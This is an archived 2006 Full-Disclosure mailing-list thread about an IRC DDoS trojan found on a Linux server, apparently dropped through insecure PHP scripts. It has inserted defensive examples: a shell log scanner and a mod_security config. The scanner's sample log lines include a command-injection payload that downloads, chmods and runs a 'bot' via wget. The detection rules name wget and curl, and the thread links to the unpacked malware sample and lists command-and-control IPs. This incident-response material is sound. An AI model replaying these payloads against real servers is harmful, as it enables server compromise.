[Full-disclosure] Trojan found on Linux server

2006-01-02 Thread Gaddis, Jeremy L.
After having a customer report that he had large amounts of outbound 
traffic from one of his Linux servers, I began to investigate and found 
a trojan.


The trojan had created a crontab for the nobody user (Apache was 
running as nobody and, while I did not take the time to verify I believe 
that Apache was probably the way the intruder got in) which, at 24 
minutes after the hour, would write itself out to /tmp/ummtodkhk and 
then execute itself.


The /tmp/ummtodkhk file was packed with UPX.  It has been unpacked and 
made available at http://www.jeremygaddis.com/files/ummtodkhk.  It was 
submitted to VirusTotal, but nothing identified as anything known.


The results of `crontab -l -u nobody > nobody.cron` are available at 
http://www.jeremygaddis.com/files/nobody.cron.


-j

--
Jeremy L. Gaddis, GCWN, Linux+, Network+
LinuxWiz Consulting
http://www.linuxwiz.net/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Trojan found on Linux server

2006-01-02 Thread Niek

On 1/2/2006 10:31 PM +0200, Gaddis, Jeremy L. wrote:
After having a customer report that he had large amounts of outbound 
traffic from one of his Linux servers, I began to investigate and found 
a trojan.


The trojan had created a crontab for the nobody user (Apache was 
running as nobody and, while I did not take the time to verify I believe 
that Apache was probably the way the intruder got in) which, at 24 
minutes after the hour, would write itself out to /tmp/ummtodkhk and 
then execute itself.


The /tmp/ummtodkhk file was packed with UPX.  It has been unpacked and 
made available at http://www.jeremygaddis.com/files/ummtodkhk.  It was 
submitted to VirusTotal, but nothing identified as anything known.


The results of `crontab -l -u nobody > nobody.cron` are available at 
http://www.jeremygaddis.com/files/nobody.cron.


-j


Hi Jeremy,

This is a much-seen thing these days.
Your customer probably got attacked by an insecure PHP script 
(cacti/xmlphp/awstats/etc.). Check your Apache logs.

If I grep my logs for wget, I see tons of attempts.

The trojan is an IRC drone, listening for DDoS commands/etc.

Regards,
Niek
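The "grep my logs for wget" check Niek describes, as an added example that is not part of the thread: a small POSIX shell script that percent-decodes each Apache access-log line first (so `%77get` and `wget%20` are caught alike) and then matches the shell command words seen chained into PHP/CGI parameters. The log lines are constructed for illustration; the signature list is an assumption and should be tuned per site.

```shell
#!/bin/sh
# Added example: find remote-command-injection attempts (wget/curl chained
# into a script parameter) in an Apache access log. Sample lines below are
# constructed; the IP addresses are documentation ranges.

LOGFILE="$(mktemp)"
trap 'rm -f "$LOGFILE"' EXIT
cat > "$LOGFILE" <<'EOF'
10.0.0.5 - - [02/Jan/2006:21:10:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 4021
192.0.2.77 - - [02/Jan/2006:21:12:44 +0200] "GET /awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20http://192.0.2.9/bot;chmod%20755%20bot;./bot;echo| HTTP/1.1" 200 312
198.51.100.3 - - [02/Jan/2006:21:15:09 +0200] "GET /cacti/graph_image.php?local_graph_id=1;curl%20-O%20http://198.51.100.8/x HTTP/1.0" 200 1020
10.0.0.7 - - [02/Jan/2006:21:20:30 +0200] "POST /xmlrpc.php HTTP/1.1" 200 211
203.0.113.4 - - [02/Jan/2006:21:24:00 +0200] "GET /adxmlrpc.php HTTP/1.1" 404 207
EOF

# Command words that almost never belong in a legitimate query string when
# preceded by a shell separator (assumed signature list; tune per site).
INJECT_RE='(^|[;|` ])(wget|curl|fetch|lynx|chmod|perl|cd|sh)[[:space:]]'

url_decode() {
    # Decode %XX sequences byte by byte using only POSIX sh features
    # (printf octal escapes), so encoded payloads cannot dodge the match.
    _in="$1"; _out=""
    while [ -n "$_in" ]; do
        case "$_in" in
            %[0-9A-Fa-f][0-9A-Fa-f]*)
                _rest="${_in#???}"
                _hex="${_in%"$_rest"}"; _hex="${_hex#%}"
                _out="$_out$(printf "\\$(printf '%03o' "$((0x$_hex))")")"
                _in="$_rest" ;;
            *)
                _out="$_out${_in%"${_in#?}"}"
                _in="${_in#?}" ;;
        esac
    done
    printf '%s\n' "$_out"
}

scan_access_log() {
    # Print every raw log line whose decoded form matches INJECT_RE.
    while IFS= read -r line; do
        decoded="$(url_decode "$line")"
        if printf '%s' "$decoded" | grep -Eq "$INJECT_RE"; then
            printf '%s\n' "$line"
        fi
    done < "$1"
}

count_injection_attempts() {
    scan_access_log "$1" | wc -l | tr -d ' '
}

# Demo run against the constructed log: two of the five lines are hits.
scan_access_log "$LOGFILE"
```

Run it against the real log with `scan_access_log /var/log/httpd/access_log`; the matches give you the script that was abused and the URL the payload was fetched from, which is what you want before rebuilding.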


Re: [Full-disclosure] Trojan found on Linux server

2006-01-02 Thread Gaddis, Jeremy L.

Niek wrote:

This is a much-seen thing these days.
Your customer probably got attacked by an insecure PHP script 
(cacti/xmlphp/awstats/etc.). Check your Apache logs.

If I grep my logs for wget, I see tons of attempts.


Roger that.  It wasn't important enough to us to pursue.  I just 
recently signed on with this customer and was in the process of moving 
their websites over to new, freshly installed servers from the Red Hat 
Linux 9 boxes they were running on.  Since we're about to rebuild the 
server anyways, it wasn't worth the time to pursue.



The trojan is an IRC drone, listening for DDoS commands/etc.


Yep, when running strings on it I noticed a few IP addresses 
(219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as 
commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.)


-j

--
Jeremy L. Gaddis, GCWN, Linux+, Network+
LinuxWiz Consulting
http://www.linuxwiz.net/


Re: [Full-disclosure] Trojan found on Linux server

2006-01-02 Thread Morning Wood
 Yep, when running strings on it I noticed a few IP addresses 
 (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as 
 commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.)

64.239.9.236 = copticpope.tv
http://64.239.9.236/  http://copticpope.tv heh?



Re: [Full-disclosure] Trojan found on Linux server

2006-01-02 Thread GroundZero Security

 If I grep my logs for wget, I see tons of attempts.

You should use mod_security then.
It blocks off all those script kidz and worms.
Sure, a clever person is able to circumvent that too, but
most of such scans are made by kids and worms, so
just configure mod_security for Apache :-)

regards,
sk

GroundZero Security Research and Software Development
http://www.groundzero-security.com 
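A mod_security configuration along the lines sk suggests, as an added example that is not from the thread or from GroundZero. It assumes the ModSecurity 1.x directive syntax in use with Apache at the time (`SecFilter*` directives); the patterns are assumptions aimed at the wget/curl payloads discussed above and will need tuning, since a legitimate parameter containing "cd " or a URL will otherwise be denied.

```apache
<IfModule mod_security.c>
    SecFilterEngine On
    # Inspect POST bodies too; the PHP XML-RPC payloads arrived that way.
    SecFilterScanPOST On
    # Reject malformed percent-encoding rather than guessing at it.
    SecFilterCheckURLEncoding On
    SecFilterDefaultAction "deny,log,status:403"

    # Keep full request detail only for requests that triggered a rule.
    SecAuditEngine RelevantOnly
    SecAuditLog logs/audit_log

    # Shell download/execution commands chained into a script parameter.
    SecFilterSelective ARGS "(^|[;|` ])(wget|curl|fetch|lynx)[[:space:]]"
    SecFilterSelective ARGS "(^|[;|` ])(chmod|cd|perl|sh)[[:space:]]+[^[:space:]]"

    # Remote file inclusion: a URL passed as an include-style parameter.
    # Assumed to be tuned per site; exempt parameters that legitimately carry URLs.
    SecFilterSelective ARGS "^(http|https|ftp)://"
</IfModule>
```

Watch the audit log for a few days before relying on the deny action; as sk notes, this stops scanners and worms, not someone who reads the rules and re-encodes.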